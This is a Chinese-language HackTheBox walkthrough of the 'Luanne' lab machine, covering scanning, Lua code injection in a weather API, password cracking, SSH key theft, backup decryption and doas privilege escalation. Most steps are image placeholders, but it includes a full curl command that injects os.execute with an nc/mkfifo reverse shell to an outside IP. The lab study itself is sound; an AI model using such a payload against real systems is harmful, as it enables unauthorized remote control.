Luanne - HackTheBox
Td

image

nmap扫描

image

image

image

80端口扫到个robots.txt

image

发现一个目录

image

扫一下

image

image

image

这貌似是要加上这个参数

image

image

输出了一堆城市名

image

image

报错了

image

貌似不是注入

image

搜了半天,这貌似是个RCE

image

image

在后面拼接需要执行的命令

反弹个shell

image

在这执行貌似不行,得用curl

curl -G --data-urlencode "city=') os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 7777 >/tmp/f') --" 'http://10.10.10.218/weather/forecast' -s

image

image

提权

image

在网站目录下发现.htpasswd文件

image

貌似是个加密密码,爆破一下

image

看看9001端口

image

输入刚刚爆破出来的密码,但是无法登录

image

80端口倒是登录上了,没什么可利用信息

image

用curl请求本地的提权检测脚本执行

image

image

在靶机本地开放了3000和3001端口,curl请求看看

image

还检测到r.michaels用户可以以root权限运行doas

image

9001端口的账号密码,尝试登录

image

image

没有RCE

image

401错误,尝试带入之前爆破而来的账号密码

image

貌似就是80端口的信息,在看看3001

image

还是一样,搜了一下,貌似是要带上r.michaels的家目录路径

image

image

发现一个id_rsa密钥,可能是r.michaels用户的

image

复制到本地,尝试连接

image

发现一个backups目录

image

image

devel_backup-2020-09-16.tar.gz.enc貌似是个加密的压缩包

解密netpgp --decrypt --output=/tmp/backup.tar.gz devel_backup-2020-09-16.tar.gz.enc

image

解压

image

解压后在www目录下发现.htpasswd

image

继续爆破

image

之前脚本检测到一个doas.conf文档,搜一下

image

image

image

可以以root权限执行doas文件

image

尝试输入刚刚破解的密码

image

image